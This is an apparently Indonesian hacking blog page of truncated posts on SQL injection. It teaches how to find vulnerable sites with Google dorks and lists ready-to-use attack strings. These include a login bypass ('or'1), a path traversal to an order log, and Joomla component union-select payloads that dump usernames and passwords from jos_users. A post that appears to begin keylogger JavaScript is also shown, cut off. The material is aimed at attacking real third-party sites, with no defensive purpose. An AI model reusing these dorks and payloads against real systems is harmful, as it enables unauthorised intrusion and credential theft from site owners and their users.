Blind SQL Injection Oleh Selalu_ngantuk

sepintas tekhnik ini sama dengan tekhnik SQL pada umumnya...
Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --

###################
## +step Satu+ ##
###################
carilah target
salah satunya menggunakan search engine pada google !!
sebagai penjelasan klik disini

misal: [site]/berita.php?id=

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh: [site]/berita.php?id=100' ... Read more »

1. contoh bugs pada bentuk toko sistem shopadmin :
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
Ketik google.com :--> allinurl:/shopadmin.asp
Contoh target : www.xxxxxx.com/shopadmin.asp
Kelemahan sistem ini bila penjahat memasukan kode injection seperti :
user : 'or'1
pass : 'or'1

2. contoh bugs pada bentuk toko sistem : Index CGI
contoh toko akan muncul di search engine bila mengetikan beberapa
keyword, seperti :
google.com : Ketik --> allinurl:/store/index.cgi/page=
Contoh target : www.xxxxxx.com/cgi-bin/store/index.cgi? ... t_blue.htm
Hapus short_blue.htm dan ganti dengan --> ../admin/files/order.log
Hasilnya:www.xxxxxxx.com/cgi-bin/store/index.cgi?page=../admin/files/
order.log

... Read more »

weleh pas mau nyari2 pilem bagus ,,jiahh gak taunya udah di depes...btw goodluck ,deh om
heheh and lagunya cakep hehehe
bersih-bersih ahhh....

Pertama bukalah notepad kesayangan kalian atau yang lainnya kayak Wordpad, Notepad ++... Pokoknya terserah dah...

Kemudian paste kode berikut:

[+]------------------------------------------------------------------

 var key = '';

 var space = ' '

 function start()

 {

 var xmlh
		
		... 
		
			Read more »
		
	

Jalan sore-sore ke forum lumajangCrew eh dapet ginian

Jomla Live chat

Dork:
allinurl:option=com_livechat

Exploit :
administrator/components/com_livechat/getChat.php?chat=0&last=1=+union+select+
1,unhex(hex(concat(username,0x3a,password))),3,4+from+jos_users

administrator/components/com_livechat/getSavedChatRooms.php?chat=
0&last=1+union+select+1,unhex(hex(concat(username,0x3a,password))),3+from+jos_users

Joomla "option=com_juser"
info http://milw0rm.com/exploits/8847

Dork:
inurl:option=com_juser

exploit:
index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat
(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--

Joomla "com_jvideo"
info dari h ... Read more »